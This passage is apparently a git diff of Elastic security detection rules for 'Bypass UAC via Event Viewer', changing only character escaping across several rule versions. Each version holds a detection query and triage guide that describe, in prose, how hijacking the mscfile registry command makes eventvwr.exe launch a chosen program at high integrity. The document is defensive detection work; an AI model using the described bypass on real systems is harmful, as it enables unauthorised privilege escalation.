analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"eventvwr.exe\" and\n not process.executable :\n (\"?:\\\\Windows\\\\SysWOW64\\\\mmc.exe\",\n \"?:\\\\Windows\\\\System32\\\\mmc.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\")\n", "related_integrations": [ { @@ -50,7 +50,7 @@ ], "risk_score": 73, "rule_id": "31b4c719-f2b4-41f6-a9bd-fce93c2eaf62", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/31b4c719-f2b4-41f6-a9bd-fce93c2eaf62_107.json b/packages/security_detection_engine/kibana/security_rule/31b4c719-f2b4-41f6-a9bd-fce93c2eaf62_107.json index 1e7f0ce6a01..7d89660595e 100644 --- a/packages/security_detection_engine/kibana/security_rule/31b4c719-f2b4-41f6-a9bd-fce93c2eaf62_107.json +++ b/packages/security_detection_engine/kibana/security_rule/31b4c719-f2b4-41f6-a9bd-fce93c2eaf62_107.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Bypass UAC via Event Viewer", - "note": "## Triage and analysis\n\n### Investigating Bypass UAC via Event Viewer\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nDuring startup, `eventvwr.exe` checks the registry value of the `HKCU\\Software\\Classes\\mscfile\\shell\\open\\command` registry key for the location of `mmc.exe`, which is used to open the `eventvwr.msc` saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user. This rule detects this UAC bypass by monitoring processes spawned by `eventvwr.exe` other than `mmc.exe` and `werfault.exe`.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Bypass UAC via Event Viewer\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nDuring startup, `eventvwr.exe` checks the registry value of the `HKCU\\Software\\Classes\\mscfile\\shell\\open\\command` registry key for the location of `mmc.exe`, which is used to open the `eventvwr.msc` saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user. This rule detects this UAC bypass by monitoring processes spawned by `eventvwr.exe` other than `mmc.exe` and `werfault.exe`.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"eventvwr.exe\" and\n not process.executable :\n (\"?:\\\\Windows\\\\SysWOW64\\\\mmc.exe\",\n \"?:\\\\Windows\\\\System32\\\\mmc.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\")\n", "related_integrations": [ { @@ -50,7 +50,7 @@ ], "risk_score": 73, "rule_id": "31b4c719-f2b4-41f6-a9bd-fce93c2eaf62", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/31b4c719-f2b4-41f6-a9bd-fce93c2eaf62_108.json b/packages/security_detection_engine/kibana/security_rule/31b4c719-f2b4-41f6-a9bd-fce93c2eaf62_108.json index 74a6dfd05a1..1b7df36faee 100644 --- a/packages/security_detection_engine/kibana/security_rule/31b4c719-f2b4-41f6-a9bd-fce93c2eaf62_108.json +++ b/packages/security_detection_engine/kibana/security_rule/31b4c719-f2b4-41f6-a9bd-fce93c2eaf62_108.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Bypass UAC via Event Viewer", - "note": "## Triage and analysis\n\n### Investigating Bypass UAC via Event Viewer\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nDuring startup, `eventvwr.exe` checks the registry value of the `HKCU\\Software\\Classes\\mscfile\\shell\\open\\command` registry key for the location of `mmc.exe`, which is used to open the `eventvwr.msc` saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user. This rule detects this UAC bypass by monitoring processes spawned by `eventvwr.exe` other than `mmc.exe` and `werfault.exe`.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Bypass UAC via Event Viewer\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nDuring startup, `eventvwr.exe` checks the registry value of the `HKCU\\Software\\Classes\\mscfile\\shell\\open\\command` registry key for the location of `mmc.exe`, which is used to open the `eventvwr.msc` saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user. This rule detects this UAC bypass by monitoring processes spawned by `eventvwr.exe` other than `mmc.exe` and `werfault.exe`.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"eventvwr.exe\" and\n not process.executable :\n (\"?:\\\\Windows\\\\SysWOW64\\\\mmc.exe\",\n \"?:\\\\Windows\\\\System32\\\\mmc.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\")\n", "related_integrations": [ { @@ -50,7 +50,7 @@ ], "risk_score": 73, "rule_id": "31b4c719-f2b4-41f6-a9bd-fce93c2eaf62", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -86,7 +86,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/31b4c719-f2b4-41f6-a9bd-fce93c2eaf62_109.json b/packages/security_detection_engine/kibana/security_rule/31b4c719-f2b4-41f6-a9bd-fce93c2eaf62_109.json index 93b0d25f01b..06c4a728b79 100644 --- a/packages/security_detection_engine/kibana/security_rule/31b4c719-f2b4-41f6-a9bd-fce93c2eaf62_109.json +++ b/packages/security_detection_engine/kibana/security_rule/31b4c719-f2b4-41f6-a9bd-fce93c2eaf62_109.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Bypass UAC via Event Viewer", - "note": "## Triage and analysis\n\n### Investigating Bypass UAC via Event Viewer\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nDuring startup, `eventvwr.exe` checks the registry value of the `HKCU\\Software\\Classes\\mscfile\\shell\\open\\command` registry key for the location of `mmc.exe`, which is used to open the `eventvwr.msc` saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user. This rule detects this UAC bypass by monitoring processes spawned by `eventvwr.exe` other than `mmc.exe` and `werfault.exe`.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and analysis\n\n### Investigating Bypass UAC via Event Viewer\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nDuring startup, `eventvwr.exe` checks the registry value of the `HKCU\\Software\\Classes\\mscfile\\shell\\open\\command` registry key for the location of `mmc.exe`, which is used to open the `eventvwr.msc` saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user. This rule detects this UAC bypass by monitoring processes spawned by `eventvwr.exe` other than `mmc.exe` and `werfault.exe`.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - 